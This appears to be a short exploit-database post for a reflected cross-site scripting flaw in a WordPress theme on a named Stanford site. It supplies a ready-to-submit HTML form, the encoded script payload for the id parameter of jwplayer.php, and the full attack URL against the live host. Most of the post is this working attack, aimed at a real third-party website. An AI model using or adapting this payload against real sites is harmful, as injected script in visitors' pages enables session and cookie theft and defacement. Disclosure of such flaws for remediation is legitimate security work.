WordPress Stanford Theme Cross Site Scripting

/**************************************** /***********************************************************************************
** Exploit Title: Stanford Wordpress Template Cross Site Scripting
Vulnerability
**
** Exploit Author: Sha4yan
**
** Vendor Homepage : http://stvp.stanford.edu/
**
** Google Dork: none
**
** Date: 2016-01-01
**
** Tested on: Ubuntu / Mozila Firefox
**
************************************************************************************
** Exploit Code:
******************

<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<form method="POST"
action="http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E">
<input type="submit" value="Exploit@Sha4yan"/>
</form>
</body>
</html>

************************************************************************************
Location & Vulnerable query:
******************

http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=

Add This : %22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

*************************************************************************************
** Proof:
******************

Executable script tag in Stanford's own page:

Exploit : "><script>alert(/xss/)</script>

Exploit query:
http://stvp.stanford.edu/wp-content/themes/stvp/jwplayer.php?id=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E


******************************************************************************************
** Persian Underground GateWay
******************************************************************************************

Leave a comment